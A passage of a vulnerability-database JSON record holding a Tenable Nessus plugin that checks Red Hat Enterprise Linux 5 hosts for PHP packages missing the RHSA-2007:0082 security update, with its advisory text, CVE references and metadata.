{"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2018-09-01T23:33:21", "modified": "2016-12-29T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html", "http://rhn.redhat.com/errata/RHSA-2007-0082.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/29 15:35:20 $\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:33:21"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "235ef73aacd3c98bd8a26e36742ff4ae"}, {"key": "cvelist", "hash": "5ed89809cd59db22c6c4bc5e691596fe"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "2e53e2231fd68fdc02c53c3b32b818ad"}, {"key": "href", "hash": "4b44f6da67fcb87f1db557fc9f19e20c"}, {"key": "modified", "hash": "0e4da7304285381f16759537beaada44"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "141eb5e5e7f7efcaf70f35531014315a"}, {"key": "published", "hash": "ddc199dc1dacc50b088328ca4eddaf1b"}, {"key": "references", "hash": "350b87797b39b224a4879af085aa2c91"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "16ae60f65e15ed9cdc48cbd74258f565"}, {"key": "title", "hash": "c986b43752781caa839decc2a0741192"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "67a07b2c3fe6bdf48010729418415b97d7d9ebaab09f151bb1e38f14c67105f8", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2007-0081.NASL", "ORACLELINUX_ELSA-2007-0076.NASL", "CENTOS_RHSA-2007-0076.NASL", "REDHAT-RHSA-2007-0076.NASL", "DEBIAN_DSA-1264.NASL", "UBUNTU_USN-424-2.NASL", "UBUNTU_USN-424-1.NASL", "SLACKWARE_SSA_2007-053-01.NASL", "MANDRAKE_MDKSA-2007-048.NASL", "FREEBSD_PKG_7FCF1727BE7111DBB2EC000C6EC775D9.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0076", "ELSA-2007-0348"]}, {"type": "openvas", "idList": ["OPENVAS:840188", "OPENVAS:136141256231058066", "OPENVAS:830326", "OPENVAS:840061", "OPENVAS:58066", "OPENVAS:861324", "OPENVAS:1361412562310830326", "OPENVAS:1361412562310100606", "OPENVAS:861271", "OPENVAS:58010"]}, {"type": "slackware", "idList": ["SSA-2007-053-01"]}, {"type": "centos", "idList": ["CESA-2007:0076", "CESA-2007:0081-01", "CESA-2007:0154-01"]}, {"type": "redhat", "idList": ["RHSA-2007:0076", "RHSA-2007:0088", "RHSA-2007:0082", "RHSA-2007:0081", "RHSA-2007:0154"]}, {"type": "ubuntu", "idList": ["USN-424-2", "USN-424-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7248", "SECURITYVULNS:VULN:7279", "SECURITYVULNS:VULN:7547", "SECURITYVULNS:VULN:7355", "SECURITYVULNS:VULN:7473"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1264-1:CBFFE"]}, {"type": "freebsd", "idList": ["7FCF1727-BE71-11DB-B2EC-000C6EC775D9"]}, {"type": "suse", "idList": ["SUSE-SA:2007:020", "SUSE-SA:2007:044"]}, {"type": "cve", "idList": ["CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0906", "CVE-2007-0907", "CVE-2007-0909", "CVE-2007-0908", "CVE-2007-1701", "CVE-2007-1380", "CVE-2007-0988", "CVE-2007-1285"]}, {"type": "gentoo", "idList": ["GLSA-200703-21"]}, {"type": "exploitdb", "idList": ["EDB-ID:29807", "EDB-ID:3413", "EDB-ID:3572", "EDB-ID:29692"]}, {"type": "osvdb", "idList": ["OSVDB:33957", "OSVDB:32765", "OSVDB:32767", "OSVDB:32763", "OSVDB:34710", "OSVDB:34715", "OSVDB:32766", "OSVDB:32764", "OSVDB:34708", "OSVDB:34714"]}], "modified": "2019-02-21T01:09:54"}, "score": {"value": 8.3, "vector": "NONE", "modified": "2019-02-21T01:09:54"}, "vulnersScore": 8.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif 